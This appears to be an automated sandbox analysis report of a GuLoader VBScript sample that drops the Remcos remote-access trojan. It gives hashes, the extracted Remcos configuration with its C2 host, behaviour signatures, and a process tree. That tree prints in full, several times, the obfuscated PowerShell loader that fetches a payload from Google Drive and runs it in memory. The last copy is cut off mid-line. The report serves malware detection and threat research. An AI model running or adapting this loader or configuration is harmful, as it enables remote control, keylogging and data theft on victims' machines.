guloader | 6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5

General

Target

6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5.vbe
Size

33KB
MD5

3d931d67341a7178eed6018098e82026
SHA1

28738415421b3631245b7f8939ff625bb2d56d7a
SHA256

6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5
SHA512

7ba628cd12f11eede084bdc30a29c1d1092b14ba468bcbab319b327e637ffb49d825298402ec4389f8e9032a4741a8ca015132d47a31336e8cb4e56750f9f979
SSDEEP

384:Z9vOg3Z9KsZOs0gN/C2NE3+DEytdZbFo/SwiKFTblveb0fyio/:Zp3Z/N/C2K3v2LfwiKFsk4

Score

10^/10

guloader remcos remotehost discovery downloader rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WDQFG0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2288	powershell.exe
5	2288	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
8	drive.google.com
2	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2672	wabmig.exe
2672	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1944	powershell.exe
2672	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1944 set thread context of 2672	1944	powershell.exe	37

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
1944	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2288	powershell.exe
1944	powershell.exe
1944	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1944	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2672	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2288	2792	WScript.exe	30
PID 2792 wrote to memory of 2288	2792	WScript.exe	30
PID 2792 wrote to memory of 2288	2792	WScript.exe	30
PID 2288 wrote to memory of 2744	2288	powershell.exe	32
PID 2288 wrote to memory of 2744	2288	powershell.exe	32
PID 2288 wrote to memory of 2744	2288	powershell.exe	32
PID 2288 wrote to memory of 1844	2288	powershell.exe	34
PID 2288 wrote to memory of 1844	2288	powershell.exe	34
PID 2288 wrote to memory of 1844	2288	powershell.exe	34
PID 1844 wrote to memory of 1944	1844	cmd.exe	35
PID 1844 wrote to memory of 1944	1844	cmd.exe	35
PID 1844 wrote to memory of 1944	1844	cmd.exe	35
PID 1844 wrote to memory of 1944	1844	cmd.exe	35
PID 1944 wrote to memory of 1404	1944	powershell.exe	36
PID 1944 wrote to memory of 1404	1944	powershell.exe	36
PID 1944 wrote to memory of 1404	1944	powershell.exe	36
PID 1944 wrote to memory of 1404	1944	powershell.exe	36
PID 1944 wrote to memory of 2672	1944	powershell.exe	37
PID 1944 wrote to memory of 2672	1944	powershell.exe	37
PID 1944 wrote to memory of 2672	1944	powershell.exe	37
PID 1944 wrote to memory of 2672	1944	powershell.exe	37
PID 1944 wrote to memory of 2672	1944	powershell.exe	37
PID 1944 wrote to memory of 2672	1944	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6754a5938953902145151e2bacfcfd6e55d6f943464fecbc10ce13fd7cc130c5.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
    3⤵
    PID:2744
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ ChapSReasstOver,iArchal oroglFleureunreadOpfriepisc .fotomDTiendoUnc lw enetn.orstlbutyloTi,baaOverld NedeFMai gi G.nil GrdieRedni(U.age$ DepoOAdlydtDislie levilMaanecYor.ro,ngios M.thiHephts Fo s,Gr nd$FanouRS,illi GennmZygmuiH,mene MiljrNekro1 Manu3Konte1Draen) ord ';$Rimier131=$Morbillous[0];unhoard (Sereh 'gsten$PersoG elicl Bl mODerivbFortyAFarmel fy i:ObstrSVildttAbol UFalsud SnvrIYard eBrevoPVidunlBeh,nAMegald delsBlokdEDolibRW altnNon ee Gours Anke= Noct(Enes tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#lammergeier Illustrationsideer sesquialteran Bestyrelsesposter #>;$hemen='Pacificer';<#Mesymnion urgeringens Unmitigative Ivorybill Fremfringshastighed Afreet Araneae #>;$Fluorindine92=$host.PrivateData;If ($Fluorindine92) {$Tvivlsommererritamentet++;}function Sereh($Stopventilernes){$Tvivlsommerebenholtsfljterne=$Stopventilernes.Length-$Tvivlsommererritamentet;for( $Tvivlsommere=5;$Tvivlsommere -lt $Tvivlsommerebenholtsfljterne;$Tvivlsommere+=6){$Nationaliserings+=$Stopventilernes[$Tvivlsommere];}$Nationaliserings;}function unhoard($Bronchium){ . ($Himmelfartsdag) ($Bronchium);}$Operationalization=Sereh 'HydroM W tcoAf.ndz Me.liBlodbl ValflultraaModer/Vint 5 Tilp.Coppi0 Fins Regn(ZooloWBabuaivansinAnfordAldehoBalt.wPdagosTotur NonaNEnkelTIbrnd Voetg1 Redn0 Unha.U sub0 .iaa;raasi CommoW premi AmtsnIngeb6F lse4Oatme;Samle Fa gsxUved.6Snoda4 Biet;Lavri Bilamr TwitvThrou:Smreo1 Hest2 tem1Overc.Gleet0Bitni)Bogs twinsG Da,ieOptagcDeplokAroynoNonde/I ida2 Mili0Boile1 Sho,0Myoto0,verw1 Octa0Skriv1Rheum SlacFKnstkiHjlperByggee HexifSatsao BegyxLeg,t/Compa1 .ena2Damph1 Admo.I dsk0Enzym ';$Concaptive=Sereh 'RyggeuCoproSEfterestipuRKe ta- baanA Hy,oGHemm EPanteNpampeTPe ep ';$Otelcosis=Sereh 'Over hFllestC upatPattepBhagas ykew:Ceci / Vidn/UopstdUdsvirB idgiwaz.rv Al re alou.S.eelgPinaco Wh,roSolubg Cirkl ResieQuest.SubjacCharkoSinusm Slle/SydliuD lbacVinte?EnsreeCo.ntx SkpppHjkuloSkejsrMonittCo.dy= JudidPomewo Rs iwKropenForunlReimpoOutsta ,rbed ,orb&kvik,iD ktad ypog=Gyld 1AfgraYLuftibNeedeJ UnerKFl nt5MaanegHo esHCo orsStudizPaginNBukniXRec nP SkilMPanam8Olieb2AutopvBacteEHove rs.aphVJelsea D reZ remeyDilet- T whWA sti6 CeilRComatV,enostTa,lwFHag,iTHes.erBlackM Ophi ';$Elementhusene=Sereh 'Amoti>Feuda ';$Himmelfartsdag=Sereh 'nonreiPar.lEPolyox.ncho ';$Nonsenet='varelagre';$Nullernes = Sereh 'Arbe.eSchiscBjrgshGu rioB ugt Phren%Barn aNondapPostapRhei dV,lidaTa tat,nvigaSpart% M.xo\MalabF,eaneiUnflanFibriaNyfi.n Su.ecMagniiUndereOndskrSandveG.mmad onvi. Gig a Ano dConspvTesta Lavtg&Afska& P ag Ud.age A gocLyk ehResuro.egro ivertr spr ';unhoard (Sereh 'Glute$BandegJi.gllAfbrno KonfbP.npaaseptilTj ne:UnderMPliero Henrrro dybtilstiFloorlmedi,lLucitoAkkomumili s onta= Incr(IncorcSl.tnmFightddomsm Rooml/vuersc.fsmi Acc p$fusioN AfpluRodeolKrs.llProcyeArealrho.ednBra.keCo pusAkele)inter ');unhoard (Sereh 'Specu$Synkrgreprol CenooBen obSelinaTupi l hete:Solb P MonaoTrskenVandid Pande TirerInforaIndfatHemagi PresoIndrmn Prec=frems$InterOtriantPropre PicklCa,lic,kkorode.pesK.utzieclecsconco.UtumrsKvivapKund lBeklii,lykktSkriv(Spond$arbejE ,trilI laye S,elmBonnieHemm n SpeltCristhC einu UnglsOverbeMonomn A lee traa)Parad ');unhoard (Sereh 'Fores[BalanNSkilleHet rtFalsk.PeriaS cus efe rirA,strvBe.agiVoidscErhveeImperPOcty oLe idiOmrr.nDrabbtMonocMReskoashaggn ftraPourag.tasseslvbrrSogdi]Eryth:Cr,pt:S nknSP aeoe Fl bcCosciuRenterArchoiSel ut CoeryCreosP Es,rr HemooTabultkor,noMorphcbull oto.relLilan Fedte=Ko,me Flles[MaledN ologeaetertVolum.Unc rSO opheAbomic Eksau IngerVaskei Cyr t SkinyOverdPFurlarBroanoB neftOrdbooS rupcOckfloAdvoklTurneTEvoley MennpNybygeDist ] heva:artol:LnsatTvati,lenkensBakke1 Belk2en ri ');$Otelcosis=$Ponderation[0];$Anvendelsesorienteret112= (Sereh ' rabe$ .rang Str.LMa egOPratiBGasteA MakklBonas:Haan,sSygeeT quidiOr.erLSmalrlBenv.E Overd U oreCaim =Rickln ,enzENdpl WGrafb-FortroLivsnBSky sJBesvrEsm.okcSwoonTBando u meaSTrst,y Matus olytGa maEErg mMFlsk,.Damm NAngule lonetExp.d.Fa ciwPrevee UndibBetnkcD mkaLSkattiUnrepEsubfunNonstT');$Anvendelsesorienteret112+=$Morbillous[1];unhoard ($Anvendelsesorienteret112);unhoard (Sereh ' .pid$AwakaSVddeltStep i T,rmlForbalSnowsePrededscr.eeAfslr.GroggHUptrueBarbraFat yd Hynees,fisr Porrs kspo[Cirku$TelesCKloveoDrontnHam dcUnrowatils pBlod.t Gau i trakvSeni eVagne]Alkal=Tota $ PapiOLen mpagaleeIrritrhemaraK ntatCar siDo,beoTnkemnBidraaHematl KogeiHydrozNishiaBedsttAmphiiSamp oSectinTubat ');$Dekoreredes=Sereh 'Pl gu$ 